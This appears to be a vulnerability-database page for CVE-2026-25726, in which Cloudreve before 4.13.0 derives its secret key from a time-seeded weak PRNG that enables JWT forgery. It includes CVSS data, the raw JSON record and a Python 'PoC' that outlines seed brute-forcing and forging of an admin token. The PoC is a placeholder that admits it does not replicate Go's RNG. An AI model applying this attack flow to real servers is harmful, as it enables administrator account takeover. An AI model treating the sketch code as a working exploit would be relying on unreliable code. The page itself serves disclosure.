Security Vulnerability Report
中文
CVE-2026-25726 CVSS 8.1 HIGH

CVE-2026-25726

Published: 2026-04-03 20:16:02
Last Modified: 2026-04-13 18:31:43
Source: [email protected]

Description

Cloudreve is a self-hosted file management and sharing system. Prior to version 4.13.0, the application uses the weak pseudo-random number generator math/rand seeded with time.Now().UnixNano() to generate critical security secrets, including the secret_key, and hash_id_salt. These secrets are generated upon first startup and persisted in the database. An attacker can exploit this by obtaining the administrator's account creation time (via public API endpoints) to narrow the search window for the PRNG seed, and use known hashid to validate the seed. By brute-forcing the seed (demonstrated to take <3 hours on general consumer PC), an attacker can predict the secret_key. This allows them to forge valid JSON Web Tokens (JWTs) for any user, including administrators, leading to full account takeover and privilege escalation. This issue has been patched in version 4.13.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cloudreve:cloudreve:*:*:*:*:*:*:*:* - VULNERABLE
Cloudreve < 4.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time import jwt # pip install pyjwt # Simulate the weak PRNG logic (Go's math/rand) # Note: Actual implementation requires replicating Go's specific RNG algorithm def simulate_cloudreve_weak_rng(seed_ns): # Pseudo-random generation based on seed # In real exploit, this generates the specific secret_key format return f"secret_key_{seed_ns}" def brute_force_seed(target_hashid, start_time_ns, window_seconds=10): print(f"[*] Brute forcing seed near {start_time_ns}...") # Iterate through nanoseconds in the time window for ns_offset in range(window_seconds * 1_000_000_000): current_seed = start_time_ns + ns_offset # Simulate generating secrets with this seed predicted_salt = simulate_cloudreve_weak_rng(current_seed) # Check if generated salt matches the observed hashid # (Simplified check for PoC demonstration) if hash(predicted_salt) == hash(target_hashid): secret_key = simulate_cloudreve_weak_rng(current_seed + 123) # Offset simulating key generation print(f"[+] Seed found: {current_seed}") return secret_key return None # Exploit Scenario # 1. Obtain admin creation time via API admin_creation_time = int(time.time() * 1_000_000_000) # Nanoseconds known_hashid = "observed_hash_id_from_api" # 2. Brute force to recover secret_key secret_key = brute_force_seed(known_hashid, admin_creation_time) if secret_key: # 3. Forge Admin JWT admin_payload = { "id": 1, "username": "admin", "role": "admin", "exp": int(time.time()) + 3600 } forged_token = jwt.encode(admin_payload, secret_key, algorithm="HS256") print(f"[+] Forged Admin JWT: {forged_token}") else: print("[-] Failed to recover secret_key")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25726", "sourceIdentifier": "[email protected]", "published": "2026-04-03T20:16:02.263", "lastModified": "2026-04-13T18:31:43.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cloudreve is a self-hosted file management and sharing system. Prior to version 4.13.0, the application uses the weak pseudo-random number generator math/rand seeded with time.Now().UnixNano() to generate critical security secrets, including the secret_key, and hash_id_salt. These secrets are generated upon first startup and persisted in the database. An attacker can exploit this by obtaining the administrator's account creation time (via public API endpoints) to narrow the search window for the PRNG seed, and use known hashid to validate the seed. By brute-forcing the seed (demonstrated to take <3 hours on general consumer PC), an attacker can predict the secret_key. This allows them to forge valid JSON Web Tokens (JWTs) for any user, including administrators, leading to full account takeover and privilege escalation. This issue has been patched in version 4.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-338"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cloudreve:cloudreve:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.13.0", "matchCriteriaId": "0607E1D4-BDC8-40FC-9495-F19E4AE2F6BE"}]}]}], "references": [{"url": "https://github.com/cloudreve/cloudreve/releases/tag/4.13.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cloudreve/cloudreve/security/advisories/GHSA-f8xp-wvcx-p6f4", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.